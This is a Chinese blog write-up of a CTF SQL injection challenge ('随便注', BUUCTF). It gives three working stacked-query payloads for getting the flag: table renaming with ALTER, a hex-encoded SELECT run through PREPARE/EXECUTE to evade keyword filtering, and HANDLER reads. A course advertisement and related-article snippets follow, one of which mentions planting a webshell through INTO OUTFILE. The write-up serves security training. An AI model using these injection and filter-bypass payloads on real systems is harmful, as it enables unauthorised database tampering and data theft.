buuctf[强网杯 2019]随便注 1(超详细,三种解法)

于 2024-05-12 10:48:39 发布
阅读量271 收藏 6
点赞数 3
分类专栏: 程序员 文章标签: 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84968940/article/details/138748764
版权

后台SQL查询语句应该是:
select * from words where id=
所以说只能先查询id字段,然而另一个表只有一个flag字段是肯定爆不了flag的,并且类型为varchar字符串类型,而恰巧words数据表里面的data也是varchar类型,因此从这里就可以得到做题思路,通过rename函数进行改表,把1919810931114514改为words,增加新字段id,将flag改为data,将刚开始那个words表改为其他任意表。
构造payload:
1';rename table words to BaiMao;rename table 1919810931114514 to words;alter table words add id int unsigned not NULL auto_increment primary key;alter table words change flag data varchar(100);#

rename修改表名
alter修改已知的列
add增加
int整数类型
unsigned无符号类型
not null- 指示某列不能存储 NULL 值。
primary key - NOT NULL 和 UNIQUE 的结合。指定主键,确保某列(或多个列的结合)有唯一标识,每个表有且只有一个主键。
auto_increment-自动赋值,默认从1开始。

成功回显flag:
image.png
注意没有回显flag,就类似于你更新了个东西但是没刷新,重新在文本框里面输入1提交即可回显flag。

第二种解法 编码逃逸 绕过滤

由于select被过滤,考虑使用编码进行绕过
使用select查询就很简单了
构造payload
select *from where 1919810931114514``(注意这里使用反引号把这个数字包括住,md编辑器打不上去)
*号查询数据表里面的全部内容,这就是爆出flag的原理
进行16进制编码加密
73656c656374202a2066726f6d20603139313938313039333131313435313460
最终payload:
1';SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#

  • prepare…from…是预处理语句,会进行编码转换。
  • execute用来执行由SQLPrepare创建的SQL语句。
  • SELECT可以在一条语句里对多个变量同时赋值,而SET只能一次对一个变量赋值。
  • 0x就是把后面的编码格式转换成16进制编码格式
  • 那么总体理解就是,使用SeT方法给变量a赋值,给a变量赋的值就是select查询1919810931114514表的所有内容语句编码后的值,execsql方法执行来自a变量的值,prepare…from方法将执行后的编码变换成字符串格式,execute方法调用并执行execsql方法。
    参考:https://blog.csdn.net/qq_44657899/article/details/10323914

回显flag:
image.png

第三种解法 handler代替select

select命令被过滤了怎么办?我们还可以用handler命令进行查看,handler命令可以一行一行的显示数据表中的内容。
构造payload:
1'; handler 1919810931114514open asa; handler a read next;#

handler代替select,以一行一行显示内容
open打开表
as更改表的别名为a
read next读取数据文件内的数据次数

上传payload,回显flag:
image.png

最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

https://bbs.csdn.net/topics/618653875)

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

2401_84968940
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
基于python的sql入脚本
03-04
适合刚学python和sql入的人 import urllib2 import re
w12-课堂1-三种解法.zip
11-20
在本课程资料“w12-课堂1-三种解法.zip”中,我们可以看到三个不同的C语言源代码文件——w12-in-1-loop1.c、w12-in-1-loop2.c和w12-in-1-recur.c,以及一个readme.txt说明文件。这些文件着重探讨了同一个问题的不同...
SQL 登录入脚本_[CTF]BugkuCTF - Web - sql入2
weixin_39581972的博客
11-21 136
http://123.206.87.240:8007/web2/ 全都tm过滤了绝望吗? 提示 !,!=,=,+,-,^,%尝试进行SQL 入,发现有过滤。判断过滤关键字符串。还是有很多关键字没有过滤的SQL 入测试uname=admin说明用户名正确。uname=admin'^(length('ajest')!=5)^'此处可以考虑使用异或入。uname=admin'^(uname!='a...
wp-Bugkuctf-web-38(sql入)【附脚本】
bin789456的博客
08-23 2586
写在前面 本题提示是布尔入,在之前的布尔入中,一般是针对能否登录的布尔来进行信息获取,这里是利用username是否存在的布尔来进行信息获取,同时伴随着一些关键字过滤,对于布尔入的进一步学习有一些帮助。 WP 首先弱密码尝试,显示 password error 更改后显示 username does not exist 这里就是一组布尔,存在与否 输一些关键字测试一下: and,or,=,' ' 看来有关键字屏蔽,并且大小写混用没啥用。 继续测试发现…还过滤了空格,逗号,等号,for 空格用括
ctf各种sql盲脚本
qq_51862722的博客
08-17 2828
以下的几个脚本都是自己写的(有参考别的大佬),代码可能不是最精简,但是还算顺眼 核心算法都是二分法,不推荐时间盲(速度硬伤) 脚本payload参考题目:[第一章 web入门]SQL入-2 / 极客大挑战finilysql(buuctf) 1.通过post传参的脚本 用的时候修改post参数和个数 1.1 基于异或盲,布尔盲等: import requests url = 'http://736aa374-b497-441f-9b6a-a1c91f9b182b.node4.buuoj.cn:
CTF学习笔记:SQL入(显错入)
a12332251的博客
12-07 714
SQL
静定结构的解法
04-02
介绍了关于静定结构的解法详细说明,提供其它知识的技术资料的下载。
65-数组中出现一次数字的三种解法1
08-08
HashMap用桶的话会有一个问题,加入这个数组的取值范围是0~9999,数组的组成是{1,2,9998,2,1},我们为了把5个数中间单独出现的那一个数取出来
约瑟夫环的三种解法.zip
11-02
本文将详细讲解约瑟夫环的三种常见解法,并以C++语言为例进行实现。 一、数组解法 数组解法是最直观的一种方法,通过一个整型数组模拟人员站位,数组下标表示编号,值表示人。每一轮剔除掉数组中的某个元素,然后...
CTF-web题之简单的SQL入,html前端技术开发
最新发布
碧海朝天素
03-30 887
2,3说明页面回显的是结果集中第二三行的数据那么我们可以,如:则返回2,babysql显然babysql就是正在查询的数据库名有group_concat()将group by产生的相同分组的值连接成一个字符串(原本是分行显示),才使得查询结果能一并显示出来则返回2user,flag,显然flag藏在flag表中则返回2user,flag。
三步法搞定CTF中的SQL入题型
weixin_30536513的博客
04-03 471
三步法: 一、找到入点 二、Fuzz出未过滤字符 三、构造payload/写脚本 例题1 打开题目: 第一步,寻找入点。 输入用户名123456,密码123456,返回结果username error! 输入用户名admin,密码123456,返回结果password error! 输入用户名admin,密码admin,返回结果password e...
CTF-Web(2)SQL
大表哥的博客
10-26 484
1.入介绍1.入介绍1.目标存在sql入漏洞,且已经获取目标的绝对路径2.并且通过探测发现目标能够进行数据的导入和导出操作,即secure_file_priv为空3.当前数据库是(即dba权限)4.利用Into outfile() (写入文件的函数),向指定路径写入一句话木马5.webshell连接工具连接一句话木马,成功获得权限区别:手工入需要手动输入参数判断入点,盲则利用脚本、自动化工具爆破。
二、sql入(CTF技巧)
黑日里不灭的light
03-14 502
解释:在一些题目里面常常充满了各种各样的过滤,我们需要结合实际情况去进行入,下面提供一些Payload以及适用场景。
BUUCTF [CISCN2019 华北赛区 Day2 Web1]Hack World 1(SQL入之布尔盲
m0_73734159的博客
12-09 930
在进行布尔盲攻击时,攻击者首先需要对目标应用程序进行SQL入,然后根据页面返回的结果来判断入是否成功。布尔入是一种常见的SQL入攻击技术,攻击者通过构造恶意输入,使应用程序的SQL查询返回不同的结果,从而达到绕过应用程序的安全机制,获取未授权的信息或执行恶意操作的目的。总之,布尔盲是一种比较复杂的SQL入攻击方式,需要攻击者具备一定的技术水平和耐心。这种攻击方式主要利用Web页面的返回结果,根据页面返回的True或者是False来得到数据库中的相关信息。可知是字符型的布尔入(盲
CTFSHOW WEB入门——sql
Chur的博客
07-22 4075
ctfshow 靶场 web入门 sql入系列
CTF-SQL
weixin_44770698的博客
06-16 5019
CTF-SQL入题目整理
CTFer成长之路之CTF中的SQL
自强不息
02-20 1488
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
CTF入门之SQL
PolarPeak的博客
12-08 2161
一、字符型入 <?php require_once('../header.php'); require_once('db.php'); $sql = "SELECT * FROM users where name = '"; $sql .= $_GET['name']."'"; $result = mysql_query($sql); if($result) { ?> <?php while ($row = mysql_fetch_assoc($result)){ echo
CTFSHOW-sql
Yb_140的博客
08-13 2444
web171 最简单的sql入,先演示基本操作 payload: -1' union select 1,2,database() --+ //得到数据库名为ctfshow_web -1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web' --+ //得到数据表名为ctfshow_user -1' union select
0-1背包问题三种解法
05-19
以下是三种解法: 1. 动态规划解法:将问题转化为填表格的形式,状态转移方程为 dp[i][j] = max(dp[i-1][j], dp[i-1][j-w[i]] + v[i]),其中 dp[i][j] 表示前 i 个物品放入容量为 j 的背包中所能获得的最大价值,w...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值